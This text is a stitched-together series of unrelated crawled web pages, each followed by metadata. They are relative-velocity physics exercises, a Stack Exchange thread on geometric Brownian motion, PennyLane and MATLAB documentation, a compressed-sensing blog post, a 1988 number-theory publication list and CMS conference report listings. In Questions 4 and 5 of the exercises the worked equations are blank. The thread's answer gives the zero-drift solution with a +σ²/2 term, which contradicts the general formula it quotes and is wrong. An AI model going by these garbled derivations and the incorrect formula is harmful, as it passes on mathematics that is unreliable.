Question 1: A train is moving at a speed of 100 Km/h. The person sitting inside the train starts moving in the direction of the train at a speed of 10Km/h. Find the velocity of the person with respect to the ground.
Given:
velocity of the train with respect to the ground, vTG = 100Km/h
velocity of the person with respect to the train, vPT = 10Km/h
velocity of the person with respect to the ground vPG,
The equation mentioned above states,
vPG = vPT + vTG
plugging the values into the above equation,
⇒ vPG = 100 + 10
⇒ vPG = 110
Question 2: A train is moving at a speed of 100 Km/h. The person sitting inside the train starts moving in the opposite direction of the train at a speed of 10Km/h. Find the velocity of the person with respect to the ground.
Given:
velocity of the train with respect to the ground, vTG = 100Km/h
velocity of the person with respect to the train, vPT = -10Km/h
velocity of the person with respect to the ground vPG,
The equation mentioned above states,
vPG = vPT + vTG
plugging the values into the above equation,
⇒ vPG = 100 – 10
⇒ vPG = 90
Question 3: A vehicle is moving at a speed of 3i + 4j m/s. The person inside the car thinks the bird is flying at a velocity of 2i + 2j m/s. Find the speed of the bird with respect to the direct.
Given:
velocity of the vehicle with respect to the ground, vVG = 3i + 4j
velocity of the bird with respect to the vehicle, vBV = 2i + 2j
velocity of the person with respect to the ground vBG,
The equation mentioned above states,
vBG = vBV + vVG
plugging the values into the above equation,
⇒ vPG = 2i + 2j + 3i + 4j
⇒ vPG = 5i + 6j
⇒ |vPG| = √61 m/s
Question 4: Two particles A and B are moving with velocities 30Km/h and 40Km/h respectively towards an intersection as shown in the figure. Find the velocity of particle A with respect to the velocity of particle B.
Given: vA = 30 Km/h and vB = 40 Km/h.
Figure shows they are moving in perpendicular directions.
Velocity of A with respect to earth: vAE = 30i
Velocity of B with respect to earth: vBE = -40j
Using the equation studied above, velocity of A with respect to B: vAB
Assuming that the earth is the connecting frame of reference here,
⇒
⇒
magnitude of this velocity is
⇒
⇒
Question 5: Two particles A and B are moving with velocities 10Km/h and 20Km/h respectively towards an intersection as shown in the figure. Find the velocity of particle A with respect to the velocity of particle B.
Given: vA = 10 Km/h and vB = 20 Km/h.
Figure shows they are moving in perpendicular directions.
Velocity of A with respect to earth: vAE = 10i
Velocity of B with respect to earth: vBE = -20j
Using the equation studied above, velocity of A with respect to B: vAB
Assuming that the earth is the connecting frame of reference here,
⇒
⇒
magnitude of this velocity is
⇒
⇒
My Personal Notes arrow_drop_up
|
2023-03-20 13:37:23
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.809657096862793, "perplexity": 461.8742854018944}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943483.86/warc/CC-MAIN-20230320114206-20230320144206-00450.warc.gz"}
|
https://stats.stackexchange.com/questions/336712/solution-geometric-brownian-brownian-motion-with-no-drift
|
# Solution Geometric Brownian Brownian motion with no drift
This question has been asked before in here Geometric Brownian motion without drift but I can't find what I want in the answers so ask again differently: for $\mu=0$ $$dX_t =\mu X_t dt + \sigma X_t dW_t = \sigma X_t dW_t$$ Does it become: $$(1) x_T = e^{\sigma(W_T-W_t)}$$ or $$(2) x_T = e^{0.5\sigma^2(T-t)+\sigma(W_T-W_t)}$$ (2) seems unlikely for me because the process is clearly a local Martingale but (2) is not
The general solution is $$X_t=X_0 e^{(\mu-\frac{\sigma^2}{2})t+\sigma W_t}$$
If $\mu=0$, it is just $$X_t=X_0 e^{(\frac{\sigma^2}{2})t+\sigma W_t}$$
• I think that's buried in the general solution. Are you saying the closed-form general solution works for any $\mu$ other than zero? – eSurfsnake Mar 27 '18 at 5:36
|
2019-08-17 21:32:17
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8600755333900452, "perplexity": 357.99662989721594}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027312025.20/warc/CC-MAIN-20190817203056-20190817225056-00418.warc.gz"}
|
https://docs.pennylane.ai/en/stable/introduction/interfaces.html?highlight=optimizers
|
PennyLane offers seamless integration between classical and quantum computations. Code up quantum circuits in PennyLane, compute gradients of quantum circuits, and connect them easily to the top scientific computing and machine learning libraries.
## Training and interfaces¶
The bridge between the quantum and classical worlds is provided in PennyLane via interfaces to automatic differentiation libraries. Currently, four libraries are supported: NumPy, PyTorch, JAX, and TensorFlow. PennyLane makes each of these libraries quantum-aware, allowing quantum circuits to be treated just like any other operation. Any automatic differentiation framework can be chosen with any device.
In PennyLane, an automatic differentiation framework is declared using the interface argument when creating a QNode, e.g.,
@qml.qnode(dev, interface="tf")
def my_quantum_circuit(...):
...
Note
If no interface is specified, PennyLane will default to the NumPy interface (powered by the autograd library).
This will allow native numerical objects of the specified library (NumPy arrays, JAX arrays, Torch Tensors, or TensorFlow Tensors) to be passed as parameters to the quantum circuit. It also makes the gradients of the quantum circuit accessible to the classical library, enabling the optimization of arbitrary hybrid circuits by making use of the library’s native optimizers.
When specifying an interface, the objects of the chosen framework are converted into NumPy objects and are passed to a device in most cases. Exceptions include cases when the devices support end-to-end computations in a framework. Such devices may be referred to as backpropagation or passthru devices.
See the links below for walkthroughs of each specific interface:
In addition to the core automatic differentiation frameworks discussed above, PennyLane also provides higher-level classes for converting QNodes into both Keras and torch.nn layers:
pennylane.qnn.KerasLayer(qnode, …) Converts a QNode() to a Keras Layer. pennylane.qnn.TorchLayer(qnode, …) Converts a QNode() to a Torch layer.
Note
QNodes that allow for automatic differentiation will always incur a small overhead on evaluation. If you do not need to compute quantum gradients of a QNode, specifying interface=None will remove this overhead and result in a slightly faster evaluation. However, gradients will no longer be available.
## Optimizers¶
Optimizers are objects which can be used to automatically update the parameters of a quantum or hybrid machine learning model. The optimizers you should use are dependent on your choice of the classical autodifferentiation library, and are available from different access points.
### NumPy¶
When using the standard NumPy framework, PennyLane offers some built-in optimizers. Some of these are specific to quantum optimization, such as the QNGOptimizer, LieAlgebraOptimizer RotosolveOptimizer, RotoselectOptimizer, ShotAdaptiveOptimizer, and QNSPSAOptimizer.
AdagradOptimizer Gradient-descent optimizer with past-gradient-dependent learning rate in each dimension. AdamOptimizer Gradient-descent optimizer with adaptive learning rate, first and second moment. AdaptiveOptimizer Optimizer for building fully trained quantum circuits by adding gates adaptively. GradientDescentOptimizer Basic gradient-descent optimizer. LieAlgebraOptimizer Lie algebra optimizer. MomentumOptimizer Gradient-descent optimizer with momentum. NesterovMomentumOptimizer Gradient-descent optimizer with Nesterov momentum. QNGOptimizer Optimizer with adaptive learning rate, via calculation of the diagonal or block-diagonal approximation to the Fubini-Study metric tensor. RMSPropOptimizer Root mean squared propagation optimizer. RotosolveOptimizer Rotosolve gradient-free optimizer. RotoselectOptimizer Rotoselect gradient-free optimizer. ShotAdaptiveOptimizer Optimizer where the shot rate is adaptively calculated using the variances of the parameter-shift gradient. SPSAOptimizer The Simultaneous Perturbation Stochastic Approximation method (SPSA) is a stochastic approximation algorithm for optimizing cost functions whose evaluation may involve noise. QNSPSAOptimizer Quantum natural SPSA (QNSPSA) optimizer.
### PyTorch¶
If you are using the PennyLane PyTorch framework, you should import one of the native PyTorch optimizers (found in torch.optim).
### TensorFlow¶
When using the PennyLane TensorFlow framework, you will need to leverage one of the TensorFlow optimizers (found in tf.keras.optimizers).
### JAX¶
Check out the JAXopt and the Optax packages to find optimizers for the PennyLane JAX framework.
The interface between PennyLane and automatic differentiation libraries relies on PennyLane’s ability to compute or estimate gradients of quantum circuits. There are different strategies to do so, and they may depend on the device used.
When creating a QNode, you can specify the differentiation method like this:
@qml.qnode(dev, diff_method="parameter-shift")
def circuit(x):
qml.RX(x, wires=0)
return qml.probs(wires=0)
PennyLane currently provides the following differentiation methods for QNodes:
### Simulation-based differentiation¶
The following methods use reverse accumulation to compute gradients; a well-known example of this approach is backpropagation. These methods are not hardware compatible; they are only supported on statevector simulator devices such as default.qubit.
However, for rapid prototyping on simulators, these methods typically out-perform forward-mode accumulators such as the parameter-shift rule and finite-differences. For more details, see the quantum backpropagation demonstration.
• "backprop": Use standard backpropagation.
This differentiation method is only allowed on simulator devices that are classically end-to-end differentiable, for example default.qubit. This method does not work on devices that estimate measurement statistics using a finite number of shots; please use the parameter-shift rule instead.
• "adjoint": Use a form of backpropagation that takes advantage of the unitary or reversible nature of quantum computation.
The adjoint method reverses through the circuit after a forward pass by iteratively applying the inverse (adjoint) gate. This method is similar to "backprop", but has significantly lower memory usage and a similar runtime.
### Hardware-compatible differentiation¶
The following methods support both quantum hardware and simulators, and are examples of forward accumulation. However, when using a simulator, you may notice that the time required to compute the gradients with these methods scales linearly with the number of trainable circuit parameters.
• "parameter-shift": Use the analytic parameter-shift rule for all supported quantum operation arguments, with finite-difference as a fallback.
• "finite-diff": Use numerical finite-differences for all quantum operation arguments.
• "device": Queries the device directly for the gradient. Only allowed on devices that provide their own gradient computation.
Note
If not specified, the default differentiation method is diff_method="best". PennyLane will attempt to determine the best differentiation method given the device and interface. Typically, PennyLane will prioritize device-provided gradients, backpropagation, parameter-shift rule, and finally finite differences, in that order.
In addition to registering the differentiation method of QNodes to be used with autodifferentiation frameworks, PennyLane also provides a library of gradient transforms via the qml.gradients module.
Quantum gradient transforms are strategies for computing the gradient of a quantum circuit that work by transforming the quantum circuit into one or more gradient circuits. They accompany these circuits with a function that post-processes their output. These gradient circuits, once executed and post-processed, return the gradient of the original circuit.
Examples of quantum gradient transforms include finite-difference rules and parameter-shift rules; these can be applied directly to QNodes:
dev = qml.device("default.qubit", wires=2)
@qml.qnode(dev)
def circuit(weights):
qml.RX(weights[0], wires=0)
qml.RY(weights[1], wires=1)
qml.CNOT(wires=[0, 1])
qml.RX(weights[2], wires=1)
return qml.probs(wires=1)
>>> weights = np.array([0.1, 0.2, 0.3], requires_grad=True)
>>> circuit(weights)
tensor([[-0.04673668, -0.09442394, -0.14409127],
Note that, while gradient transforms allow quantum gradient rules to be applied directly to QNodes, this is not a replacement — and should not be used instead of — standard training workflows (for example, qml.grad() if using Autograd, loss.backward() for PyTorch, or tape.gradient() for TensorFlow). This is because gradient transforms do not take into account classical computation nodes, and only support gradients of QNodes. For more details on available gradient transforms, as well as learning how to define your own gradient transform, please see the qml.gradients documentation.
## Differentiating gradient transforms and higher-order derivatives¶
dev = qml.device("default.qubit", wires=2)
@qml.qnode(dev)
def circuit(weights):
qml.RX(weights[0], wires=0)
qml.RY(weights[1], wires=1)
qml.CNOT(wires=[0, 1])
qml.RX(weights[2], wires=1)
return qml.expval(qml.PauliZ(1))
>>> weights = np.array([0.1, 0.2, 0.3], requires_grad=True)
>>> circuit(weights)
array([[-0.09347337, -0.18884787, -0.28818254]])
array([[[-0.9316158 , 0.01894799, 0.0289147 ],
[ 0.01894799, -0.9316158 , 0.05841749],
[ 0.0289147 , 0.05841749, -0.9316158 ]]])
Another way to compute higher-order derivatives is by passing the max_diff and diff_method arguments to the QNode and by successive differentiation:
@qml.qnode(dev, diff_method="parameter-shift", max_diff=2)
def circuit(weights):
qml.RX(weights[0], wires=0)
qml.RY(weights[1], wires=1)
qml.CNOT(wires=[0, 1])
qml.RX(weights[2], wires=1)
return qml.expval(qml.PauliZ(1))
>>> weights = np.array([0.1, 0.2, 0.3], requires_grad=True)
>>> qml.jacobian(qml.jacobian(circuit))(weights) # hessian
array([[-0.9316158 , 0.01894799, 0.0289147 ],
[ 0.01894799, -0.9316158 , 0.05841749],
[ 0.0289147 , 0.05841749, -0.9316158 ]])
Note that the max_diff argument only applies to gradient transforms and that its default value is 1; failing to set its value correctly may yield incorrect results for higher-order derivatives. Also, passing diff_method="parameter-shift" is equivalent to passing diff_method=qml.gradients.param_shift.
## Supported configurations¶
The table below show all the currently supported functionality for the "default.qubit" device. At the moment, it takes into account the following parameters:
• The interface, e.g. "jax"
• The differentiation method, e.g. "parameter-shift"
• The return value of the QNode, e.g. qml.expval() or qml.probs()
• The number of shots, either None or an integer > 0
Return type
Interface
Differentiation method
state
density matrix
probs
sample
expval (obs)
expval (herm)
expval (proj)
var
vn entropy
mutual info
None
"device"
1
1
1
1
1
1
1
1
1
1
"backprop"
1
1
1
1
1
1
1
1
1
1
"adjoint"
2
2
2
2
2
2
2
2
2
2
"parameter-shift"
2
2
2
2
2
2
2
2
2
2
"finite-diff"
2
2
2
2
2
2
2
2
2
2
"autograd"
"device"
3
3
3
3
3
3
3
3
3
3
"backprop"
4
4
5
9
5
5
5
5
5
5
"adjoint"
6
6
6
6
7
7
7
6
6
6
"parameter-shift"
10
10
8
9
8
8
8
8
10
10
"finite-diff"
10
10
8
9
8
8
8
8
8
8
"jax"
"device"
3
3
3
3
3
3
3
3
3
3
"backprop"
5
5
5
9
5
5
5
5
5
5
"adjoint"
6
6
6
6
7
7
7
6
6
6
"parameter-shift"
10
10
8
9
8
8
8
8
10
10
"finite-diff"
10
10
8
9
8
8
8
8
8
8
"tf"
"device"
3
3
3
3
3
3
3
3
3
3
"backprop"
5
5
5
9
5
5
5
5
5
5
"adjoint"
6
6
6
6
7
7
7
6
6
6
"parameter-shift"
10
10
8
9
8
8
8
8
10
10
"finite-diff"
10
10
8
9
8
8
8
8
8
8
"torch"
"device"
3
3
3
3
3
3
3
3
3
3
"backprop"
5
5
5
9
5
5
5
5
5
5
"adjoint"
6
6
6
6
7
7
7
6
6
6
"parameter-shift"
10
10
8
9
8
8
8
8
10
10
"finite-diff"
10
10
8
9
8
8
8
8
8
8
1. Not supported. Gradients are not computed even though diff_method is provided. Fails with error.
2. Not supported. Gradients are not computed even though diff_method is provided. Warns that no auto-differentiation framework is being used, but does not fail. Forward pass is still supported.
3. Not supported. The default.qubit device does not provide a native way to compute gradients. See Device jacobian for details.
4. Supported, but only when shots=None. See Backpropagation for details.
If the circuit returns a state, then the circuit itself is not differentiable directly. However, any real scalar-valued post-processing done to the output of the circuit will be differentiable. See State gradients for details.
5. Supported, but only when shots=None. See Backpropagation for details.
6. Not supported. The adjoint differentiation algorithm is only implemented for computing the expectation values of observables. See Adjoint differentation for details.
7. Supported. Raises warning when shots>0 since the gradient is always computed analytically. See Adjoint differentation for details.
8. Supported.
9. Not supported. The discretization of the output caused by wave function collapse is not differentiable. The forward pass is still supported. See Sample gradients for details.
10. Not supported. “We just don’t have the theory yet.”
|
2023-02-06 22:05:08
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.40909597277641296, "perplexity": 4595.5872140771025}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500365.52/warc/CC-MAIN-20230206212647-20230207002647-00376.warc.gz"}
|
https://it.mathworks.com/help/vision/ref/opticalflowhs.estimateflow.html
|
# estimateFlow
Estimate optical flow
## Description
example
flow = estimateFlow(opticFlow,I) estimates optical flow between two consecutive video frames.
## Examples
collapse all
Create a VideoReader object for the input video file, visiontraffic.avi. Specify the timestamp of the frame to read as 11.
Specify the optical flow estimation method as opticalFlowHS. The output is an object specifying the optical flow estimation method and its properties.
opticFlow = opticalFlowHS
opticFlow =
opticalFlowHS with properties:
Smoothness: 1
MaxIteration: 10
VelocityDifference: 0
Create a custom figure window to visualize the optical flow vectors.
h = figure;
movegui(h);
hViewPanel = uipanel(h,'Position',[0 0 1 1],'Title','Plot of Optical Flow Vectors');
hPlot = axes(hViewPanel);
Read image frames from the VideoReader object and convert to grayscale images. Estimate the optical flow from consecutive image frames. Display the current image frame and plot the optical flow vectors as quiver plot.
frameGray = im2gray(frameRGB);
flow = estimateFlow(opticFlow,frameGray);
imshow(frameRGB)
hold on
plot(flow,'DecimationFactor',[5 5],'ScaleFactor',60,'Parent',hPlot);
hold off
pause(10^-3)
end
## Input Arguments
collapse all
Object for optical flow estimation, specified as one of the following:
The input opticFlow defines the optical flow estimation method and its properties used for estimating the optical flow velocity matrices.
Current video frame, specified as a 2-D grayscale image of size m-by-n. The input image is generated from the current video frame read using the VideoReader object. The video frames in RGB format must be converted to 2-D grayscale images for estimating the optical flow.
## Output Arguments
collapse all
Object for storing optical flow velocity matrices, returned as an opticalFlow object.
## Algorithms
The function estimates optical flow of the input video using the method specified by the input object opticFlow. The optical flow is estimated as the motion between two consecutive video frames. The video frame T at the given instant tcurrent is referred as current frame and the video frame T-1 is referred as previous frame. The initial value of the previous frame at time tcurrent = 0 is set as a uniform image of grayscale value 0.
Note
If you specify opticFlow as opticalFlowLKDoG object, then the estimation delays by an amount relative to the number of video frames. The amount of delay depends on the value of NumFrames defined in opticalFlowLKDoG object. The optic flow estimated for a video frame at tcurrent corresponds to the video frame at time ${t}_{flow}=\left({t}_{current}-\left(NumFrames-1\right)/2\right)$. tcurrent is the time of the current video frame.
## Version History
Introduced in R2015a
|
2022-12-07 00:25:38
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 1, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3520803153514862, "perplexity": 3634.112404868181}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711121.31/warc/CC-MAIN-20221206225143-20221207015143-00700.warc.gz"}
|
http://nuit-blanche.blogspot.com/2012/05/error-forgetting-of-bregman-iteration.html
|
## Monday, May 07, 2012
### Error Forgetting of Bregman Iteration (demo)
The following paper and attendant demo/code "explain why solving Bregman subproblems at low accuracies (1e-6) gives a Bregman solution at near the machine precision (1e-15)."
Error Forgetting of Bregman Iteration by Wotao Yin, Stanley Osher. The abstract reads:
Abstract This short article analyzes an interesting property of the Bregman iterative procedure, which is equivalent to the augmented Lagrangian method, for minimizing a convex piece-wise linear function J(x) subject to linear constraints Ax = b. The procedure obtains its solution by solving a sequence of unconstrained subproblems of minimizing J(x) + 12kAx bkk22, where b k is iteratively updated. In practice, the subproblem at each iteration is solved at a relatively low accuracy. Let w k denote the error introduced by early stopping a subproblem solver at iteration k. We show that if all wk are su ciently small so that Bregman iteration enters the optimal face, then while on the optimal face, Bregman iteration enjoys an interesting error-forgetting property: the distance between the current point x k and the optimal solution set X is bounded by kw k+1 wkk, independent of the previous errors w k1; wk2; : : : ; w1. This property partially explains why the Bregman iterative procedure works well for sparse optimization and, in particular, for `1-minimization. The error-forgetting property is unique to J(x) that is a piece-wise linear function (also known as a polyhedral function), and the results of this article appear to be new to the literature of the augmented Lagrangian method.
The demo code is here.
|
2016-12-03 19:43:47
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8267372846603394, "perplexity": 1518.994197171519}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-50/segments/1480698541134.5/warc/CC-MAIN-20161202170901-00237-ip-10-31-129-80.ec2.internal.warc.gz"}
|
http://dms.umontreal.ca/~andrew/1988.php
|
1988 Publications
The First Case of Fermat's Last Theorem is true for all prime exponents up to $$714,591,416,091,389$$ (with Michael B. Monagan) Transactions of the American Mathematical Society, 306 (1988), 329-359 .
We show that if the first case of Fermat's Last Theorem is false for prime exponent $$p$$ then $$p^2$$ divides $$q^p-q$$ for all primes $$q\leq 89$$. The title theorem follows.
Article
On Sophie Germain type criteria for Fermat's Last Theorem (with Barry J. Powell) Acta Arithmetica, 50 (1988), 265-277.
Variations on Sophie Germain's Theorem
Article
Nested Steiner $$n$$-cycle systems and perpendicular arrays (with Alexandros Moisiadis and Rolf Rees) Journal of Combinatorial Mathematics and Mathematical Computing , 3 (1988), 163-167.
We prove that for any odd $$n>1$$ and sufficiently large $$m$$ there exists a nested Steiner $$n$$-cycle system of order $$m$$ if and only of $$m\equiv 1 \pmod {2n}$$.
Article
Bipartite planes (with Alexandros Moisiadis and Rolf Rees) Congressus Numerantium, 61 (1988), 241-248.
For which integers $$s,t, n=2st$$ does there exist a decomposition of the complete graph on $$n$$ vertices into $$n-1$$ copies of the complete $$(s,t)$$-bipartite graph?
Article
|
2018-07-19 09:32:00
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9115308523178101, "perplexity": 656.3234022131751}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676590794.69/warc/CC-MAIN-20180719090301-20180719110301-00063.warc.gz"}
|
http://cds.cern.ch/collection/CMS%20Conference%20Reports?ln=zh_TW&as=1
|
CMS Conference Reports
2018-07-17
10:43
Search and measurement of the SM Higgs boson / Donato, Silvio (Zurich U.) /ATLAS and CMS Collaborations After the success of the LHC Run-1 physics program, the ATLAS and CMS Collaborations have presented their results obtained with the first $\sim 36\,\textnormal{fb}^{-1}$ of integrated luminosity delivered by the LHC at $\sqrt{s} = 13\,\textnormal{TeV}$ in Run-2. We present the main results obtained on the Standard Model Higgs boson, including the searches for specific decay and production channels, and the measurements of the Higgs boson couplings and differential cross section.. CMS-CR-2018-114.- Geneva : CERN, 2018 - 10 p. Fulltext: PDF; In : XXXII Rencontres de Physique de La Vallée d'Aoste, La Thuile(ao), Italy, 25 Feb - 3 Mar 2018
2018-07-16
10:53
Interpretation of non-MET+X ATLAS and CMS searches for dark matter scenarios / Wulz, Claudia (Vienna, OAW) /ATLAS ,CMS and SUSY Collaborations Dark matter searches by the ATLAS and CMS experiments at the CERN LHC in final states with no missing transverse energy are presented, using channels with dileptons and dijets, in particular. Through a study of dijet angular distributions the low-mass mediator regions have been explored for the first time.Most of the analyses were performed with data recorded at a centre-of-mass energy of 13~TeV.. CMS-CR-2018-125.- Geneva : CERN, 2018 - 8 p. Fulltext: PDF; In : an Alpine LHC Physics Summit, Obergurgl, Austria, 15 - 20 Apr 2018
2018-07-13
09:13
Measurement of collective flow in XeXe collisions at 5.44 TeV with the CMS experiment / Stojanovic, Milan (VINCA Inst. Nucl. Sci., Belgrade) /CMS Collaboration New measurements of collective flow in XeXe collisions at a center-of-mass energy of 5.44 TeV per nucleon pair, collected by the CMS experiment at the LHC, are presented. The $v_{2}$, $v_{3}$ and $v_{4}$ Fourier coefficients of the anisotropic azimuthal distribution are obtained employing three different analysis techniques two-particle correlations, scalar product method and multiparticle cumulants, which have different sensitivities to non-flow and flow fluctuation effects. [...] CMS-CR-2018-123.- Geneva : CERN, 2018 - 5 p. Fulltext: PDF; In : The 27th International Conference on Ultrarelativistic Nucleus-Nucleus Collisions, Venice, Italy, 13 - 19 May 2018
2018-07-13
09:13
Beyond nPDF effects: Prompt J/$\psi$ and $\psi(2S)$ production in pPb collisions with the CMS detector / Oh, Geonhee (Chonnam Natl. U.) /CMS Collaboration Measurements of prompt $\psi$(2S) meson production cross sections in proton-lead (pPb) and proton-proton (pp) collisions at a nucleon-nucleon center-of-mass energy of $\sqrt{s_{NN}}$ = 5.02 TeV are reported. The results are based on pPb and pp data collected by the CMS experiment at the LHC, corresponding to integrated luminosities of 34.6 $\mathrm{nb^{-1}}$ and 28.0 $\mathrm{pb^{-1}}$, respectively. [...] CMS-CR-2018-118.- Geneva : CERN, 2018 - 5 p. Fulltext: PDF; In : The 27th International Conference on Ultrarelativistic Nucleus-Nucleus Collisions, Venice, Italy, 13 - 19 May 2018
2018-07-13
09:13
Fragmentation of ${\rm J}\hspace{-.08em}/\hspace{-.14em}\psi$ in jets in pp collisions at $\sqrt{s} = 5.02~\mathrm{TeV}$ / Diab, Batoul (Ecole Polytechnique) /CMS Collaboration The fragmentation of jets containing a ${\rm J}\hspace{-.08em}/\hspace{-.14em}\psi$ meson is studied in 5.02~TeV pp data using an integrated luminosity of ${\cal L} = 27.39~\mathrm{pb^{-1}}$. The fraction of the jet transverse momentum $p_{\rm T,jet}$ carried by the ${\rm J}\hspace{-.08em}/\hspace{-.14em}\psi$ is measured for prompt ${\rm J}\hspace{-.08em}/\hspace{-.14em}\psi$ and ${\rm J}\hspace{-.08em}/\hspace{-.14em}\psi$ coming from b hadron decays, named nonprompt. [...] CMS-CR-2018-115.- Geneva : CERN, 2018 - 4 p. Fulltext: PDF; In : The 27th International Conference on Ultrarelativistic Nucleus-Nucleus Collisions, Venice, Italy, 13 - 19 May 2018
2018-07-13
09:13
D$^0$ Meson R$_{AA}$ in PbPb Collisions at $\sqrt s_{NN}$ = 5.02~TeV and Elliptic Flow in pPb Collisions at $\sqrt s_{NN}$ = 8.16~TeV with CMS / SHI, Zhaozhong (MIT) /CMS Collaboration The study of charm production in heavy-ion collisions is considered an excellent probe to study the properties of the hot and dense medium created in heavy-ion collisions. Measurements of D-meson nuclear modification can provide strong constraints into the mechanisms of in-medium energy loss and charm flow in the medium. [...] CMS-CR-2018-112.- Geneva : CERN, 2018 - 5 p. Fulltext: PDF; In : The 27th International Conference on Ultrarelativistic Nucleus-Nucleus Collisions, Venice, Italy, 13 - 19 May 2018
2018-07-13
09:13
Search for the chiral magnetic effect at the LHC with the CMS experiment / Tu, Zhoudunming (Rice U.) /CMS Collaboration Searches for the chiral magnetic effect (CME) using charge-dependent azimuthal correlations with respect to event planes are presented in PbPb collisions at 5.02~TeV and pPb collisions at 5.02 and 8.16~TeV, with the CMS experiment at the LHC. The azimuthal correlations with respect to the second- and third-order event planes are explored as a function of pseudorapidity, transverse momentum, and event multiplicity, which provides new insights into the underlying background correlations. [...] CMS-CR-2018-103.- Geneva : CERN, 2018 - 5 p. Fulltext: PDF; In : The 27th International Conference on Ultrarelativistic Nucleus-Nucleus Collisions, Venice, Italy, 13 - 19 May 2018
2018-07-13
09:13
